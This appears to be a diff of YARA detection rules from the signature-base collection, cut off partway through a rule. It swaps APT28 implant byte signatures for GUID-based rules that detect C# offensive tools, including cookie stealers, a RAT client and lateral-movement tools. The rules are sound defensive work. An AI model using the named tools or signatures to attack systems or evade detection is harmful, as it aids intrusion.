-rule SIGNATURE_BASE_IMPLANT_1_V2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Memscan : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "c7beab50-8e73-5161-be7e-bc3f8351873a"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L28-L43"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "35175fe1-a583-50d1-8b0c-71f19b898817"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/nccgroup/memscan"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3455-L3469"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c9bdf38303fadee3e2cfc99b70942a92ab382817a28401e8c8ab8035384c97c1"
-		score = 85
+		logic_hash = "099c6dfc9f30e56eca9834431eb527194e0302c9c6ef88f3c4fc91837a7aad7a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = {83 3E 00 53 74 4F 8B 46 04 85 C0 74 48 83 C0 02 50 E8 ?? ?? 00
-         00 8B D8 59 85 DB 74 38 8B 4E 04 83 F9 FF 7E 21 57 }
-		$STR2 = {55 8B EC 8B 45 08 3B 41 08 72 04 32 C0 EB 1B 8B 49 04 8B 04 81
-         80 78 19 01 75 0D FF 70 10 FF [5] 85 C0 74 E3 }
+		$typelibguid0lo = "79462f87-8418-4834-9356-8c11e44ce189" ascii wide
+		$typelibguid0up = "79462F87-8418-4834-9356-8C11E44CE189" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_1_V3 : FILE
-{
-	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "517133d2-813d-5f44-84c2-a53c62d7a688"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L45-L58"
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpstay : FILE
+{
+	meta:
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e5bde5a9-8e09-59ce-ad01-e29836813cf8"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/0xthirteen/SharpStay"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3471-L3485"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e418620b45bc11804eae24db3cba8421758c214fc9f660a17761bbf3395ad744"
-		score = 85
+		logic_hash = "3750df9725c739fad99d2ce5d3fab0c84112c1efb2e4e5a1348501174c4ce494"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$rol7encode = { 0F B7 C9 C1 C0 07 83 C2 02 33 C1 0F B7 0A 47 66 85 C9 75 }
+		$typelibguid0lo = "2963c954-7b1e-47f5-b4fa-2fc1f0d56aea" ascii wide
+		$typelibguid0up = "2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_1_V4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharplocker : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "0362b885-de59-5715-80f2-106e5e91d1fa"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L60-L73"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9525422a-d670-5475-abdc-b7ecd1ab9943"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/Pickfordmatt/SharpLocker"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3487-L3501"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eb8e4ed38e2e4d3991543c526c7dc458eec78c517d2c5eaa06a3a3cfb48d770f"
-		score = 85
+		logic_hash = "47cffdd5ffdf11c8afb16c031c6f44b0857ed369b2913a8c43b11bdb9d446171"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$XOR_LOOP = { 8B 45 FC 8D 0C 06 33 D2 6A 0B 8B C6 5B F7 F3 8A 82 ?? ??
-         ?? ?? 32 04 0F 46 88 01 3B 75 0C 7C E0 }
+		$typelibguid0lo = "a6f8500f-68bc-4efc-962a-6c6e68d893af" ascii wide
+		$typelibguid0up = "A6F8500F-68BC-4EFC-962A-6C6E68D893AF" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_1_V5 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sauroneye : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "ac1c6175-3a8b-524b-bb18-243c52f7dba1"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L75-L91"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3b624dde-a63e-58ac-a4db-af931f1d8553"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/vivami/SauronEye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3503-L3519"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e9660dfe76bfe1eb17b434f2ddef4975495e952396212c41550d932dbb8e8205"
-		score = 85
+		logic_hash = "4f73dabd483ad1c45e6225ef8ef664f6db1ec75a6aa300a0a6efaa63e64b2c3a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$drivername = { 6A 30 ?? 6A 33 [5] 6A 37 [5] 6A 32 [5] 6A 31 [5] 6A 77
-         [5] 6A 69 [5] 6A 6E [5] 6A 2E [5] 6A 73 [5-9] 6A 79 [5] 6A 73 }
-		$mutexname = { C7 45 ?? 2F 2F 64 66 C7 45 ?? 63 30 31 65 C7 45 ?? 6C 6C
-         36 7A C7 45 ?? 73 71 33 2D C7 45 ?? 75 66 68 68 66 C7 45 ?? 66 }
+		$typelibguid0lo = "0f43043d-8957-4ade-a0f4-25c1122e8118" ascii wide
+		$typelibguid0up = "0F43043D-8957-4ADE-A0F4-25C1122E8118" ascii wide
+		$typelibguid1lo = "086bf0ca-f1e4-4e8f-9040-a8c37a49fa26" ascii wide
+		$typelibguid1up = "086BF0CA-F1E4-4E8F-9040-A8C37A49FA26" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_1_V7 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sitrep : FILE
 {
 	meta:
-		description = "Downrage Implant by APT28"
-		author = "US CERT"
-		id = "2a28273f-d9a1-5e80-bef1-b488eb0326bd"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L112-L124"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5f2ac63e-4be1-520c-82b1-1957027a63e2"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/mdsecactivebreach/sitrep"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3521-L3535"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ff8443460e1818fd63e4dcf678bb592940b32978a70ab1633ebaa61c590d3916"
-		score = 85
+		logic_hash = "c7fa4e8bd94d86218c22c1be99221b25406e7fbae54cfadb53f81720d167e8ce"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$XOR_FUNCT = { C7 45 ?? ?? ?? 00 10 8B 0E 6A ?? FF 75 ?? E8 ?? ?? FF FF }
+		$typelibguid0lo = "12963497-988f-46c0-9212-28b4b2b1831b" ascii wide
+		$typelibguid0up = "12963497-988F-46C0-9212-28B4B2B1831B" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpclipboard : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "058266d4-8dc5-5a26-9bc6-4c55ac646e9b"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L126-L138"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fd1b7786-8853-5858-ab03-da350e44f738"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/slyd0g/SharpClipboard"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3537-L3551"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6708239ea43fd36a7c9431cd2c6c185c0d406d65c4a31374c5e96bdc3e53de43"
-		score = 85
+		logic_hash = "f935b91fcbf982af9e67f90fe1ce9086217066dd2127dea17c92db5c185b91b9"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = { 8d ?? fa [2] e8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 6a 00 6a 01}
+		$typelibguid0lo = "97484211-4726-4129-86aa-ae01d17690be" ascii wide
+		$typelibguid0up = "97484211-4726-4129-86AA-AE01D17690BE" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcookiemonster : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "747e4f76-b9c4-5988-90ae-b450548b1b82"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L140-L155"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "87be6949-f4f5-5a5a-b804-c627ed0f4355"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/m0rv4i/SharpCookieMonster"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3553-L3567"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ebfedcec6f22d802a9980ad533f21e90b77fe929a813850be1b25304d3973c3b"
-		score = 85
+		logic_hash = "a4003459096d8bfdcb4c4761d32bdccfa273c3950f90c7605d555713cd215709"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = {C1 EB 07 8D ?? 01 32 1C ?? 33 D2 }
-		$STR2 = {2B ?? 83 ?? 06 0F 83 ?? 00 00 00 EB 02 33 }
-		$STR3 = {89 ?? ?? 89 ?? ?? 89 55 ?? 89 45 ?? 3B ?? 0F 83 ?? 00 00 00 8D
-         ?? ?? 8D ?? ?? FE }
+		$typelibguid0lo = "566c5556-1204-4db9-9dc8-a24091baaa8e" ascii wide
+		$typelibguid0up = "566C5556-1204-4DB9-9DC8-A24091BAAA8E" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V5 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_P0Wnedshell : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "0e787116-d7f5-5a72-9aba-d4e6cb35bc8d"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L157-L171"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "390b94d1-dda9-5a85-80ae-c79a3f7b0b9d"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3569-L3583"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b0929b808f62e3c59c0afbe959ebf67a3a985e0a0a72bcb112c9693a98351555"
-		score = 85
+		logic_hash = "bed8f4ea30218c137a26da5059934fa93316f4a3623284c5cb3a44b8bfacf7c4"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33
-         C9 ff 15 [2] 00 00 ff 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00
-         00 00 48 8B CC E8}
+		$typelibguid0lo = "2e9b1462-f47c-48ca-9d85-004493892381" ascii wide
+		$typelibguid0up = "2E9B1462-F47C-48CA-9D85-004493892381" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V6 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpmove : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "ffadb02f-6311-567d-900b-c8a9ed172ab4"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L173-L186"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e52392f9-614c-596e-8efd-aa0a2fa44e60"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/0xthirteen/SharpMove"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3585-L3599"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "93ce725a8af03d6f08eafe99ff3984e03a434b1f0071c6dbe560bafc3eefb576"
-		score = 85
+		logic_hash = "4dd05b77d8cacb0dc208ee7bdde5358adfdf0bb04f52f1d6f12774effc547ca7"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = { e8 [2] ff ff 8b [0-6] 00 04 00 00 7F ?? [1-2] 00 02 00 00 7F
-         ?? [1-2] 00 01 00 00 7F ?? [1-2] 80 00 00 00 7F ?? 83 ?? 40 7F}
+		$typelibguid0lo = "8bf82bbe-909c-4777-a2fc-ea7c070ff43e" ascii wide
+		$typelibguid0up = "8BF82BBE-909C-4777-A2FC-EA7C070FF43E" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V7 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_C_Sharp_R_A_T_Client : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "839041d9-e27b-52a2-b5d5-f1af595826f4"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L188-L208"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f5df8257-d202-58e3-9c4a-1dfc9dd52f2a"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3601-L3615"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dd65443065f044a2956ae51140423dab202effff5f12dd686f6c4fd54d8a4a0b"
-		score = 85
+		logic_hash = "5e6a9db731caf7bc7ab79fa70c3f9bacaca8fa2d70deafe2a0b08ae4fac8a35b"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = {10 A0 FA FD 83 3D 28 D4 1F FF 77 5? ?8 B4 50 CC 1E B0 78 D7 90 13
-         21 C0 23 3D 28 BC 78 95 DE 4B B0 60 00 00 0F 7F 38 B4 50 C8 D5 9F E0
-         25 DF F3 21 C0 28 BC 13 3D 2B 90 60 00 00 0F 7F 18 B4 50 C8 BC F2 21
-         C0 28 B4 5E 48 B5 5E 00 8D 41 FE 83 F8 06 8B 45 ?? 72 ?? 8B 4D ?? 8B }
-		$s2 = {28 D9 B0 00 00 00 00 FB 65 C0 AF E8 D3 40 28 B4 5? ?0 3C 20 FA FD
-         88 D7 A0 18 D4 2F F3 3D 2F 77 5? ?C 1E B0 78 BC 73 21 C0 A3 3D 2B 90
-         60 00 00 0F 7F 18 A4 D? ?8 B4 50 C8 0E 90 20 24 D? ?3 20 C0 28 B4 5?
-         ?3 3D 2F 77 5? ?8 B4 50 C2 20 C0 28 BD 70 2D 93 01 E8 B4 D0 C8 D4 2F
-         E3 B4 5E 88 B4 5? ?8 95 5? ?7 2A 05 F5 E5 B8 BE 55 DC 20 80 }
+		$typelibguid0lo = "6d9e8852-e86c-4e36-9cb4-b3c3853ed6b8" ascii wide
+		$typelibguid0up = "6D9E8852-E86C-4E36-9CB4-B3C3853ED6B8" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V9 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpprinter : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "41f46b52-4b0e-53ee-a86c-503fe9a9532c"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L210-L236"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "10270351-ad80-5330-971b-bc8f635f05f4"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/rvrsh3ll/SharpPrinter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3617-L3631"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5947dbb08c9d0851b7993e5ccf177f97dcb330d4b390833843f69932c921ce7a"
-		score = 85
+		logic_hash = "db7f131fa38756d53681792f3de2af44ace768e66c5318f61fa199900a8cdb8e"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = { 8A C3 02 C0 02 D8 8B 45 F8 02 DB 83 C1 02 03 45 08 88 5D 0F 89
-         45 E8 8B FF 0F B6 5C 0E FE 8B 45 F8 03 C1 0F AF D8 8D 51 01 89 55 F4
-         33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 F4 C1 EB 07 32 1C 32 33 D2
-         F7 F7 8A C1 02 45 0F 2C 02 32 04 32 33 D2 88 45 FF 8B C1 8B F7 F7 F6
-         8A 45 FF 8B 75 14 22 04 32 02 D8 8B 45 E8 30 1C 08 8B 4D F4 8D 51 FE
-         3B D7 72 A4 8B 45 E4 8B 7D E0 8B 5D F0 83 45 F8 06 43 89 5D F0 3B D8
-         0F 82 ?? ?? ?? ?? 3B DF 75 13 8D 04 7F 8B 7D 10 03 C0 2B F8 EB 09 33
-         C9 E9 5B FF FF FF 33 FF 3B 7D EC 0F 83 ?? ?? ?? ?? 8B 55 08 8A CB 02
-         C9 8D 04 19 02 C0 88 45 13 8D 04 5B 03 C0 8D 54 10 FE 89 45 E0 8D 4F
-         02 89 55 E4 EB 09 8D 9B 00 00 00 00 8B 45 E0 0F B6 5C 31 FE 8D 44 01
-         FE 0F AF D8 8D 51 01 89 55 0C 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B
-         45 0C C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 13 2C 02 32 04 32 33
-         D2 88 45 0B 8B C1 8B F7 F7 F6 8A 45 0B 8B 75 14 22 04 32 02 D8 8B 45
-         E4 30 1C 01 8B 4D 0C }
+		$typelibguid0lo = "41b2d1e5-4c5d-444c-aa47-629955401ed9" ascii wide
+		$typelibguid0up = "41B2D1E5-4C5D-444C-AA47-629955401ED9" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V10 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Evilfoca : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "cb88ae0c-19e2-590c-9c13-78ac1dcc8c9f"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L238-L251"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2b2f5f6f-4224-5013-9e85-0ac088826bea"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/ElevenPaths/EvilFOCA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3633-L3647"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "62d47c1076b05bc9a531ef6e48f17f730932826b4b0f311887e3b14c639b937d"
-		score = 85
+		logic_hash = "d3302781414e5146ee8b5d7d2df8aa5d4be31308b7483200eb695e0c0048c279"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8]
-         48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01}
+		$typelibguid0lo = "f26bdb4a-5846-4bec-8f52-3c39d32df495" ascii wide
+		$typelibguid0up = "F26BDB4A-5846-4BEC-8F52-3C39D32DF495" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_IMPLANT_2_V11 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Poshc2_Misc : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "570d6996-ab16-556e-b790-e4c73d7bbffc"
-		date = "2017-02-10"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L253-L267"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "245803cb-63d8-5c75-b672-912091cf4a80"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/nettitude/PoshC2_Misc"
